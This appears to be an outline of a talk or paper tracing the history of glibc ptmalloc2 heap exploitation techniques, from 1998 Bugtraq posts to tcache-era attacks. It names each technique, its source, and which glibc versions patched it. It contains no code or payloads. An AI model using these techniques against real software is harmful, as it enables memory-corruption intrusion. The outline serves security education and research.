-
Introduction
-
ptmalloc2 Heap Overview
-
The Classical Era
- The Original Poison Null Byte
- Bugtraq Mailing List, October 1998
- Widely considered unexploitable, but patched anyway.
- 'Vudo Malloc Tricks' and 'Once Upon A Free'
- Unlink and Frontlink Techniques
- Phrack 57, August 2001
- Fixed in late 2004
- People mostly believed that the patch made killed the technique.
- After a few years, people started exploiting a variant of the technique.
- Modified version of the Unlink technique would be still be viable.
- Trend of removing a technique with a patch, only for a variant of it to still be exploitable
- Advanced Doug Lea's Malloc Exploits
- Phrack 61, August 2003
- Exploiting the Wilderness
- Bugtraq Mailing List, February 2004
- The Malloc Maleficarum
- Bugtraq Mailing list, October 2005
- Revised version of House of Lore killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- House of Spirit still exploitable.
- House of Force finally killed in glibc 2.29 in August 2018
- The use of 'set_head' to Defeat The Wilderness
- Phrack 64, May 2007
- Yet Another free() Exploitation Technique
- Phrack 66, November 2009
- The Malloc Des-Maleficarum
- Phrack 66, November 2009
- The House of Lore: Reloaded
- Phrack 67, November 2010
- The Original Poison Null Byte
-
The Renaissance: CTFs cause Heap Exploitation to go 'Sicko Mode'
- Unsafe Unlink, 2014 Edition
- HITCON CTF, August 2014
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- Poison NULL byte, 2014 Edition
- Google Project Zero, August 2014
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- Overlapping Chunks
- Glibc Adventures - The Forgotten Chunks, February, 2015
- House of Orange
- HITCON CTF, October, 2016
- "The attack vector of this technique was removed by changing the behavior of malloc_printerr in glibc 2.26
- Unsafe Unlink, 2014 Edition
- House of Einherjar
- Code Blue Conference, November 2016
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- Unsorted Bin Free Chunk Arbitrary Pointer Leak
- 0CTF, November 2016
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- Unsorted Bin Free Chunk Arbitrary Write
- Couldn't Find Origin
- tcache introduces additional constraints
- House of Rabbit
- Hatena Blog, September 2017
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- Large Bin Attack
- 0CTF, November 2018
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- The Dark Age: The Introduction of tcache
- Introduced in glibc 2.26
- Killed a lot of techniques, introduced some new avenues for attack.
- Internals
- tcache dup
- Killed in glibc version 2.28
- Introduced in glibc 2.26
- Modern Techniques
- Overlapping Chunks 2: Nonadjacent Free Chunk Consolidation Attack
- fastbin dup
- fastbin dup into stack
- fastbin dup consolidate
- tcache Poisoning
- tcache House of Spirit
- House of Botcake
- House of Fun
- PoC || GTFO 18, 2018
- House of Roman
- DEFCON 26, April 2018
- Archeap Fuzzer
- Conclusions
- Works Cited